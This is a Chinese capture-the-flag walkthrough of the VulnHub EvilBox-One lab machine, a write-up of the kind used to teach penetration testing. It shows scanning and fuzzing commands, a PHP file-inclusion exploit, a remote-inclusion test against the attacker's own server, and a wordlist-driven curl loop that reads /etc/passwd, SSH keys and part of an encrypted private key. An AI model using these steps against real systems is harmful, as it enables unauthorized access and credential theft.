靶机: EvilBox---One

靶机: EvilBox---One

准备工作

• 靶机地址: https://download.vulnhub.com/evilbox/EvilBox---One.ova

  • MD5 校验：c3a65197b891713731e6bb791d7ad259

    • cmd 进行校验: certutil -hashfile 文件路径 MD5
    • powershell 进行校验: Get-FileHash 文件路径 -Algorithm MD5 | Format-List

  • 使用 VirtualBox

  • 网络 Host-Only

• 配置网络环境：https://www.cnblogs.com/shadow-/p/16815020.html

  • kali: NAT + [ Bridged/Host-Only ]

靶机攻略

发现目标

使用常规工具：

• arp-scan
• nmap
• netdiscover
• fping

一个初步发现，使用 sudo arp-scan -l -I eth1 比较其他扫描多多少少有一定限制，nmap 适合锁定目标后进一步扫描

Interface: eth1, type: EN10MB, MAC: 08:00:27:5f:50:d7, IPv4: 192.168.56.116
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0d       (Unknown: locally administered)
192.168.56.100  08:00:27:15:0f:e5       PCS Systemtechnik GmbH
192.168.56.117  08:00:27:4d:bc:dd       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.140 seconds (119.63 hosts/sec). 3 responded

• 192.168.56.1 和 192.168.56.100 分别是网关和 DHCP 服务器地址
• 目标就是 192.168.56.117

使用一个 nmap 的常规扫描 nmap -A -T4 192.168.56.117

Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-09 09:41 CST
Nmap scan report for 192.168.56.117
Host is up (0.0012s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 4495500be473a18511ca10ec1ccbd426 (RSA)
|   256 27db6ac73a9c5a0e47ba8d81ebd6d63c (ECDSA)
|_  256 e30756a92563d4ce3901c19ad9fede64 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.77 seconds

• 确认 22 端口开放服务 OpenSSH/7.9b1

• 确认 80 端口开放服务 Apache/2.4.38

• 系统类型是 Linux: Debian

• SSH 暂且不考虑

  • 没有密码和密钥
  • 信息情报全无

• 决定从 80 的 http 下手，即便不能攻破，也能收集部分信息用于 SSH 爆破

Web 攻击

先使用 firefox 访问 http://192.168.56.117:80/ 进行初步刺探

• 发现只是一个 Apache2 Debian 的初始页面，基本没有可用信息

使用 Web 嗅探工具爬取此 Web 站点的隐藏页面，推荐以下工具

• dirsearch
• dirb
• dirbuster
• gobuster
• feroxbuster
• ffuf
• wfuzz

我们使用 dirsearch --url='192.168.56.117:80/'

┌──(kali㉿kali)-[~]
└─$ dirsearch --url='192.168.56.117:80/'

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/80-_22-11-09_09-52-49.txt

Error Log: /home/kali/.dirsearch/logs/errors-22-11-09_09-52-49.log

Target: http://192.168.56.117:80/

[09:52:49] Starting: 
[09:52:52] 403 -  279B  - /.ht_wsr.txt                                     
[09:52:52] 403 -  279B  - /.htaccess.bak1                                  
[09:52:52] 403 -  279B  - /.htaccess.sample
[09:52:52] 403 -  279B  - /.htaccess.save
[09:52:52] 403 -  279B  - /.htaccess_extra
[09:52:52] 403 -  279B  - /.htaccess_orig
[09:52:52] 403 -  279B  - /.htaccess_sc
[09:52:52] 403 -  279B  - /.htaccess.orig                                  
[09:52:52] 403 -  279B  - /.htaccessOLD
[09:52:52] 403 -  279B  - /.htaccessOLD2
[09:52:52] 403 -  279B  - /.htpasswds
[09:52:52] 403 -  279B  - /.html
[09:52:52] 403 -  279B  - /.htm                                            
[09:52:52] 403 -  279B  - /.htpasswd_test                                  
[09:52:52] 403 -  279B  - /.httr-oauth
[09:52:52] 403 -  279B  - /.htaccessBAK
[09:52:54] 403 -  279B  - /.php                                            
[09:53:51] 200 -   10KB - /index.html                                       
[09:54:23] 200 -   12B  - /robots.txt                                       
[09:54:25] 200 -    4B  - /secret/                                          
[09:54:25] 301 -  317B  - /secret  ->  http://192.168.56.117/secret/        
[09:54:25] 403 -  279B  - /server-status                                    
[09:54:25] 403 -  279B  - /server-status/

• /index.html 明显是前面 Apache2 Debian 的初始页面，没有价值

• /robots.txt 一般指robots协议，存在些许价值

  • robots 协议也称爬虫协议、爬虫规则等，是指网站可建立一个 robots.txt 文件来告诉搜索引擎哪些页面可以抓取，哪些页面不能抓取，而搜索引擎则通过读取 robots.txt 文件来识别这个页面是否允许被抓取
  • 但是这个 robots 协议不是防火墙，也没有强制执行力，搜索引擎完全可以忽视 robots.txt 文件去抓取网页的快照

• /secret 一个目录，可能需要进一步探索

我们先查看一下 http://192.168.56.117:80/robots.txt 看看有什么

• 发现一句话：Hello H4x0r

  • 科普 H4x0r 是代指 Hacker 表示黑客，是 l33t speak 的一种暗语或黑话，其中 H4x0r 便是 Hacker 的意思
  • 这个应该是对入侵者的嘲讽，没有多少价值，也可能密码或账号会与 H4x0r 有关，我们暂且收录

• robots.txt 如果是这种近乎空的内容是起到反爬虫的作用

目前还有价值的是 /secret 目录，让我们进行二次 Web 页面探取，使用 dirsearch --url='192.168.56.117:80/secret'

• 使用 dirsearch 并没有结果，我们可以尝试换一个字典，使用命令 dirsearch --url='192.168.56.117:80/secret' --wordlists=/usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -e txt,php,html,jsp

  • --wordlists= 是指定字典
  • seclists 是 kali 的一个字典集，如果没有可以直接在 kali 安装
  • -e 是指定搜索范围的文件拓展名
  • 爆破速度可能会很慢，如果 kali 分配的内核和内存足够可以不必顾虑，如果 kali 配置性能查可以使用 gobuster 命令 gobuster dir --url='192.168.56.117:80/secret' --wordlists=/usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp 毕竟 dirsearch 使用 python 速度都知道，而 gobuster 是 go 编写接近于 C 的速度

┌──(kali㉿kali)-[~]
└─$ gobuster dir --url='192.168.56.117:80/secret' -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.117:80/secret
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              txt,php,html,jsp
[+] Timeout:                 10s
===============================================================
2022/11/09 19:35:29 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 4]
/evil.php             (Status: 200) [Size: 0]ec
Progress: 708415 / 708545 (99.98%)===============================================================
2022/11/09 19:42:23 Finished
===============================================================

• 对于 Web 目录爆破使用工具不是重点，重点是 字典 选取
• 结果是 /evil.php 我们的新线索

我们尝试访问 /evil.php 发现什么也没有，即使是查看 Web 源码也没有什么，那么我们可以猜测这个页面属于脚本可能是用于处理数据的，如果是这样那一定存在请求参数这样才有数据交互，我们下一步：便是进行参数爆破

此处我们使用 ffuf 进行

• 参数字典我们使用 kali 经典的 seclists

• 我们构建的值字典：var.txt

  0
  1
  a
  '
  "
  (
  [
  {
  <
  ,
  ;
  ?
  `
  /
  \
  %
  ture
  false
  ../robots.txt
  H4x0r
  

  构建思路，可能性的猜测【触发漏洞的值，具有普遍性的内容，确定的文件，收集信息】

  • 数字类型：0, 1 表示数值或布尔值，经典试探
  • 字母：a 表示一个单字母或字符串或词
  • 括号闭合错误：', ", (, [, {, <
  • 特殊字符：, ; ? ` / \ %
  • 布尔表示：ture, false
  • 文件包含类类型：../robots.txt 这是一个我们 已知存在 且 内容不复杂易反馈 的内部文件
  • 收集信息：H4x0r

• 构建 ffuf 的命令 ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:params -w ./var.txt:var -u http://192.168.56.117/secret/evil.php?params=var -fs 0

  • -w 是知道字典，在字典组合格式是 字典路径:字典代称
  • -u 是指定爆破请求 Web 路径
  • -fs 是过滤 HTTP 响应体大小，意思是返回大小为 0 直接筛掉

┌──(kali㉿kali)-[~/workspace]
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:params -w ./var.txt:var -u http://192.168.56.117/secret/evil.php?params=var -fs 0

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.56.117/secret/evil.php?params=var
 :: Wordlist         : params: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
 :: Wordlist         : var: ./var.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

[Status: 200, Size: 12, Words: 2, Lines: 2, Duration: 50ms]
    * params: command
    * var: ../robots.txt

:: Progress: [109701/109701] :: Job [1/1] :: 1599 req/sec :: Duration: [0:02:00] :: Errors: 0 ::

• 结果表明参数是 command
• 数值是 ../robots.txt 表明 /evil.php 是文件包含作用

我们构建一个请求，对 /evil.php 功能进行进一步测试，构建 http://192.168.56.117/secret/evil.php?command=../robots.txt 用 firefox 访问并查看源码发现返回内容很 纯粹 ，与 /robots.txt 并无区别，大致可以判断其文件包含会直接返回，学习过 PHP 应该知道 PHP 文件包含漏洞，我们可以从这个方面入手

• 检查包含是否支持远程，如果能直接木马登录

  ┌──(kali㉿kali)-[~/workspace]
  └─$ ls                                                              
  var.txt
                                                                      
  ┌──(kali㉿kali)-[~/workspace]
  └─$ python3 -m http.server 80
  Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
  
  -- 水平分割 --
  ┌──(kali㉿kali)-[~]
  └─$ curl "http://192.168.56.117/secret/evil.php?command=http://192.168.56.116:80/var.txt"
  
  

  • 不支持远程

• 是否能动用 PHP 内置 URL 风格的 封装协议，如果能直接写入木马登录

  ┌──(kali㉿kali)-[~/workspace]
  └─$ curl "http://192.168.56.117/secret/evil.php?command=php://filter/read=convert.base64-encode/resource=../robots.txt"                   3 ⨯
  SGVsbG8gSDR4MHIK
  
  ┌──(kali㉿kali)-[~]
  └─$ curl "http://192.168.56.117/secret/evil.php?command=php://filter/write/resource=../robots.txt&txt=1"
  Hello H4x0r
  
  ┌──(kali㉿kali)-[~]
  └─$ curl "http://192.168.56.117/secret/evil.php?command=php://filter/read=convert.base64-encode/resource=./evil.php" | base64 --decode   1 ⨯
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                  Dload  Upload   Total   Spent    Left  Speed
  100    92  100    92    0     0   8532      0 --:--:-- --:--:-- --:--:--  9200
  <?php
      $filename = $_GET['command'];
      include($filename);
  ?>
  
  

  • 可以使用 php:// 访问各个 IO 流进行读取
  • 但无法写入数据
  • 通过加密读取，我们可以窥探 evil.php 内容，发现只是一个简单的文件上传

  <?php
      $filename = $_GET['command'];
      include($filename);
  ?>
  

• 检查包含能否对系统敏感文件直接窥探，继续收集信息寻求突破

  • 一般查看 /etc/passwd 、 /etc/shadow 、 /etc/sudoers 、 */.ssh/authorized_keys ...

  构建字典 file.txt

  /apache/apache/conf/httpd.conf
  /apache/apache2/conf/httpd.conf
  /apache/php/php.ini
  /bin/php.ini
  /etc/anacrontab
  /etc/apache/apache.conf
  /etc/apache/httpd.conf
  /etc/apache2/apache.conf
  /etc/apache2/httpd.conf
  /etc/apache2/sites-available/default
  /etc/apache2/vhosts.d/00_default_vhost.conf
  /etc/at.allow
  /etc/at.deny
  /etc/cron.allow
  /etc/cron.deny
  /etc/crontab
  /etc/fstab
  /etc/host.conf
  /etc/httpd/conf.d/httpd.conf
  /etc/httpd/conf.d/php.conf
  /etc/httpd/conf/httpd.conf
  /etc/httpd/htdocs/index.html
  /etc/httpd/htdocs/index.php
  /etc/httpd/logs/access.log
  /etc/httpd/logs/access_log
  /etc/httpd/logs/error.log
  /etc/httpd/logs/error_log
  /etc/httpd/php.ini
  /etc/init.d/httpd
  /etc/init.d/mysql
  /etc/ld.so.conf
  /etc/motd
  /etc/my.cnf
  /etc/mysql/my.cnf
  /etc/mysql/my.cnf
  /etc/network/interfaces
  /etc/networks
  /etc/passwd
  /etc/php.ini
  /etc/php/apache/php.ini
  /etc/php/apache2/php.ini
  /etc/php/cgi/php.ini
  /etc/php/php.ini
  /etc/php/php4/php.ini
  /etc/php4.4/fcgi/php.ini
  /etc/php4/apache/php.ini
  /etc/php4/apache2/php.ini
  /etc/php4/cgi/php.ini
  /etc/php5/apache/php.ini
  /etc/php5/apache2/php.ini
  /etc/php5/cgi/php.ini
  /etc/phpmyadmin/config.inc.php
  /etc/resolv.conf
  /etc/shadow
  /etc/ssh/sshd_config
  /etc/ssh/ssh_config
  /etc/ssh/ssh_host_dsa_key
  /etc/ssh/ssh_host_dsa_key
  /etc/ssh/ssh_host_dsa_key.pub
  /etc/ssh/ssh_host_dsa_key.pub
  /etc/ssh/ssh_host_key
  /etc/ssh/ssh_host_key
  /etc/ssh/ssh_host_key.pub
  /etc/ssh/ssh_host_key.pub
  /etc/ssh/ssh_host_rsa_key
  /etc/ssh/ssh_host_rsa_key
  /etc/ssh/ssh_host_rsa_key.pub
  /etc/ssh/ssh_host_rsa_key.pub
  /etc/sysconfig/network
  /etc/sysconfig/network
  /home/apache/conf/httpd.conf
  /home/apache2/conf/httpd.conf
  /home/bin/stable/apache/php.ini
  /home2/bin/stable/apache/php.ini
  /NetServer/bin/stable/apache/php.ini
  /opt/www/conf/httpd.conf
  /opt/www/htdocs/index.html
  /opt/www/htdocs/index.php
  /opt/xampp/etc/php.ini
  /PHP/php.ini
  /php/php.ini
  /php4/php.ini
  /php5/php.ini
  /root/.atftp_history
  /root/.bashrc
  /root/.bash_history
  /root/.mysql_history
  /root/.nano_history
  /root/.php_history
  /root/.profile
  /root/.ssh/authorized_keys
  /root/.ssh/identity
  /root/.ssh/identity.pub
  /root/.ssh/id_dsa
  /root/.ssh/id_dsa.pub
  /root/.ssh/id_rsa
  /root/.ssh/id_rsa.pub
  /root/anaconda-ks.cfg
  /tmp/apache/htdocs/index.html
  /tmp/apache/htdocs/index.php
  /usr/lib/php.ini
  /usr/lib/php/php.ini
  /usr/local/apache/conf/httpd.conf
  /usr/local/apache/conf/php.ini
  /usr/local/apache/htdocs/index.html
  /usr/local/apache/htdocs/index.php
  /usr/local/apache/logs/access.log
  /usr/local/apache/logs/access_log
  /usr/local/apache/logs/access_logaccess_log.old
  /usr/local/apache/logs/error.log
  /usr/local/apache/logs/error_log
  /usr/local/apache/logs/error_logerror_log.old
  /usr/local/apache2/conf/httpd.conf
  /usr/local/apache2/conf/php.ini
  /usr/local/apache2/htdocs/index.html
  /usr/local/apache2/htdocs/index.php
  /usr/local/cpanel/logs
  /usr/local/cpanel/logs/access_log
  /usr/local/cpanel/logs/error_log
  /usr/local/cpanel/logs/license_log
  /usr/local/cpanel/logs/login_log
  /usr/local/cpanel/logs/stats_log
  /usr/local/cpanel/logs/stats_log
  /usr/local/etc/php.ini
  /usr/local/httpd/conf/httpd.conf
  /usr/local/httpd2.2/htdocs/index.html
  /usr/local/httpd2.2/htdocs/index.php
  /usr/local/lib/php.ini
  /usr/local/mysql/bin/mysql
  /usr/local/mysql/my.cnf
  /usr/local/php/lib/php.ini
  /usr/local/php4/lib/php.ini
  /usr/local/php4/lib/php.ini
  /usr/local/php4/php.ini
  /usr/local/php5/etc/php.ini
  /usr/local/php5/lib/php.ini
  /usr/local/php5/php5.ini
  /usr/local/share/examples/php/php.ini
  /usr/local/share/examples/php4/php.ini
  /usr/local/tomcat5527/bin/version.sh
  /usr/local/Zend/etc/php.ini
  /usr/share/tomcat6/bin/startup.sh
  /usr/tomcat6/bin/startup.sh
  /var/apache2/config.inc
  /var/httpd/conf/httpd.conf
  /var/httpd/conf/php.ini
  /var/httpd/conf/php.ini
  /var/httpd/htdocs/index.html
  /var/httpd/htdocs/index.php
  /var/lib/mysql/my.cnf
  /var/lib/mysql/mysql/user.MYD
  /var/local/www/conf/httpd.conf
  /var/local/www/conf/php.ini
  /var/log/access.log
  /var/log/access_log
  /var/log/apache/access.log
  /var/log/apache/access_log
  /var/log/apache/error.log
  /var/log/apache/error_log
  /var/log/apache2/access.log
  /var/log/apache2/access_log
  /var/log/apache2/error.log
  /var/log/apache2/error_log
  /var/log/error.log
  /var/log/error_log
  /var/log/mysql.log
  /var/log/mysql/mysql-bin.log
  /var/log/mysql/mysql-slow.log
  /var/log/mysql/mysql.log
  /var/log/mysqlderror.log
  /var/mail/root
  /var/mysql.log
  /var/spool/cron/crontabs/root
  /var/spool/mail/root
  /var/www/conf/httpd.conf
  /var/www/htdocs/index.html
  /var/www/htdocs/index.php
  /var/www/index.html
  /var/www/index.php
  /var/www/logs/access.log
  /var/www/logs/access_log
  /var/www/logs/error.log
  /var/www/logs/error_log
  /web/conf/php.ini
  /www/conf/httpd.conf
  /www/htdocs/index.html
  /www/htdocs/index.php
  /www/php/php.ini
  /www/php4/php.ini
  /www/php5/php.ini
  /xampp/apache/bin/php.ini
  /xampp/apache/conf/httpd.conf
  root/.ssh/authorized_keys
  root/.ssh/identity
  root/.ssh/identity.pub
  root/.ssh/id_dsa
  root/.ssh/id_dsa.pub
  root/.ssh/id_rsa
  root/.ssh/id_rsa.pub
  

  构建的爆破语句 bash 脚本

  for i in $(cat ./file.txt)
  do
      echo ">>>$i:"
      curl "http://192.168.56.117/secret/evil.php?command=$i"
  done
  

下面结果经过处理，重复或无结果或结果为默认内容是被去除了的

┌──(kali㉿kali)-[~/workspace]
└─$ for i in $(cat ./file.txt)
for> do
for> echo ">>>$i:"
for> curl "http://192.168.56.117/secret/evil.php?command=$i"
for> done

>>>/etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin

>>>/etc/resolv.conf:
domain home
search home
nameserver 192.168.1.1

>>>/etc/ssh/sshd_config:
#       $OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
#PermitRootLogin prohibit-password
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

#PubkeyAuthentication yes

# Expect .ssh/authorized_keys2 to be disregarded by default in future.
#AuthorizedKeysFile     .ssh/authorized_keys .ssh/authorized_keys2

#AuthorizedPrincipalsFile none

#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!
#PasswordAuthentication yes
#PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
#GSSAPIStrictAcceptorCheck yes
#GSSAPIKeyExchange no

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes

#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
X11Forwarding yes
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
PrintMotd no
PrintLastLog no
#TCPKeepAlive yes
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /var/run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none

# no default banner path
#Banner none

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

# override default of no subsystems
Subsystem       sftp    /usr/lib/openssh/sftp-server

# Example of overriding settings on a per-user basis
#Match User anoncvs
#       X11Forwarding no
#       AllowTcpForwarding no
#       PermitTTY no
#       ForceCommand cvs server

>>>/etc/ssh/ssh_config:

# This is the ssh client system-wide configuration file.  See
# ssh_config(5) for more information.  This file provides defaults for
# users, and the values can be changed in per-user configuration files
# or on the command line.

# Configuration data is parsed as follows:
#  1. command line options
#  2. user-specific file
#  3. system-wide file
# Any configuration value is only changed the first time it is set.
# Thus, host-specific definitions should be at the beginning of the
# configuration file, and defaults at the end.

# Site-wide defaults for some commonly used options.  For a comprehensive
# list of available options, their meanings and defaults, please see the
# ssh_config(5) man page.

Host *
#   ForwardAgent no
#   ForwardX11 no
#   ForwardX11Trusted yes
#   PasswordAuthentication yes
#   HostbasedAuthentication no
#   GSSAPIAuthentication no
#   GSSAPIDelegateCredentials no
#   GSSAPIKeyExchange no
#   GSSAPITrustDNS no
#   BatchMode no
#   CheckHostIP yes
#   AddressFamily any
#   ConnectTimeout 0
#   StrictHostKeyChecking ask
#   IdentityFile ~/.ssh/id_rsa
#   IdentityFile ~/.ssh/id_dsa
#   IdentityFile ~/.ssh/id_ecdsa
#   IdentityFile ~/.ssh/id_ed25519
#   Port 22
#   Protocol 2
#   Ciphers aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,3des-cbc
#   MACs hmac-md5,hmac-sha1,umac-64@openssh.com
#   EscapeChar ~
#   Tunnel no
#   TunnelDevice any:any
#   PermitLocalCommand no
#   VisualHostKey no
#   ProxyCommand ssh -q -W %h:%p gateway.example.com
#   RekeyLimit 1G 1h
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes

>>>/etc/ssh/ssh_host_rsa_key.pub:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsg5B3Ae75r4szTNFqG247Ea8vKjxulITlFGE9YEK4KLJA86TskXQn9E24yX4cYMoF0WDn7JD782HfHCrV74r8nU2kVTw5Y8ZRyBEqDwk6vmOzMvq1Kzrcj+i4f17saErC9YVgx5/33e7UkLXt3MYVjVPIekf/sxWxS4b6N0+J1xiISNcoL/kmG3L7McJzX6Qx6cWtauJf3HOxNtZJ94WetHArSpUyIsn83P+Quxa/uaUgGPx4EkHL7Qx3AVIBbKA7uDet/pZUchcPq/4gv25DKJH4XIty+5/yNQo1EMd6Ra5A9SmnhWjSxdFqTGHpdKnyYHr4VeZ7cpvpQnoiV4y9 root@EvilBoxOne

下面是中奖内容：

• /etc/crontab 内容是默认
• /etc/fstab 内容是默认
• /etc/host.conf 内容是默认
• /etc/ld.so.conf 内容是默认
• /etc/network/interfaces 内容是默认
• /etc/networks 无用
• /etc/passwd
• /etc/resolv.conf 无用
• /etc/ssh/sshd_config 内容是默认
• /etc/ssh/ssh_config 内容是默认
• /etc/ssh/ssh_host_rsa_key.pub

新的细节发现

• /etc/passwd

  • 我们知道还存在一个名为 mowree 的用户

• /etc/ssh/ssh_host_rsa_key.pub

  • ssh 登录线索，并且登录指向 root@EvilBoxOne

信息不足，但我们有新的线索是 mowree 看看它是否存在 .ssh 的登录内容，构建一个简单的 ssh 猜测字典 ssh_dict.txt 比较我们发现 /etc/ssh/ssh_host_rsa_key.pub 的存在

/root/.ssh/authorized_keys
/root/.ssh/identity
/root/.ssh/identity.pub
/root/.ssh/id_dsa
/root/.ssh/id_dsa.pub
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/.ssh/ssh_host_dsa_key
/root/.ssh/ssh_host_dsa_key.pub
/root/.ssh/ssh_host_key
/root/.ssh/ssh_host_key.pub
/root/.ssh/ssh_host_rsa_key
/root/.ssh/ssh_host_rsa_key.pub
/home/mowree/.ssh/authorized_keys
/home/mowree/.ssh/identity
/home/mowree/.ssh/identity.pub
/home/mowree/.ssh/id_dsa
/home/mowree/.ssh/id_dsa.pub
/home/mowree/.ssh/id_rsa
/home/mowree/.ssh/id_rsa.pub
/home/mowree/.ssh/ssh_host_dsa_key
/home/mowree/.ssh/ssh_host_dsa_key.pub
/home/mowree/.ssh/ssh_host_key
/home/mowree/.ssh/ssh_host_key.pub
/home/mowree/.ssh/ssh_host_rsa_key
/home/mowree/.ssh/ssh_host_rsa_key.pub

• 攻击脚本

  for i in $(cat ./ssh_dict.txt);
  do
  echo "输出 >>>$i:";
  curl "http://192.168.56.117/secret/evil.php?command=$i";
  done
  

• 结果

  输出 >>>/root/.ssh/authorized_keys:
  输出 >>>/root/.ssh/identity:
  输出 >>>/root/.ssh/identity.pub:
  输出 >>>/root/.ssh/id_dsa:
  输出 >>>/root/.ssh/id_dsa.pub:
  输出 >>>/root/.ssh/id_rsa:
  输出 >>>/root/.ssh/id_rsa.pub:
  输出 >>>/root/.ssh/ssh_host_dsa_key:
  输出 >>>/root/.ssh/ssh_host_dsa_key.pub:
  输出 >>>/root/.ssh/ssh_host_key:
  输出 >>>/root/.ssh/ssh_host_key.pub:
  输出 >>>/root/.ssh/ssh_host_rsa_key:
  输出 >>>/root/.ssh/ssh_host_rsa_key.pub:
  输出 >>>/home/mowree/.ssh/authorized_keys:
  ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAXfEfC22Bpq40UDZ8QXeuQa6EVJPmW6BjB4Ud/knShqQ86qCUatKaNlMfdpzKaagEBtlVUYwit68VH5xHV/QIcAzWi+FNw0SB2KTYvS514pkYj2mqrONdu1LQLvgXIqbmV7MPyE2AsGoQrOftpLKLJ8JToaIUCgYsVPHvs9Jy3fka+qLRHb0HjekPOuMiq19OeBeuGViaqILY+w9h19ebZelN8fJKW3mX4mkpM7eH4C46J0cmbK3ztkZuQ9e8Z14yAhcehde+sEHFKVcPS0WkHl61aTQoH/XTky8dHatCUucUATnwjDvUMgrVZ5cTjr4Q4YSvSRSIgpDP2lNNs1B7 mowree@EvilBoxOne
  输出 >>>/home/mowree/.ssh/identity:
  输出 >>>/home/mowree/.ssh/identity.pub:
  输出 >>>/home/mowree/.ssh/id_dsa:
  输出 >>>/home/mowree/.ssh/id_dsa.pub:
  输出 >>>/home/mowree/.ssh/id_rsa:
  -----BEGIN RSA PRIVATE KEY-----
  Proc-Type: 4,ENCRYPTED
  DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
  
  uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
  hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
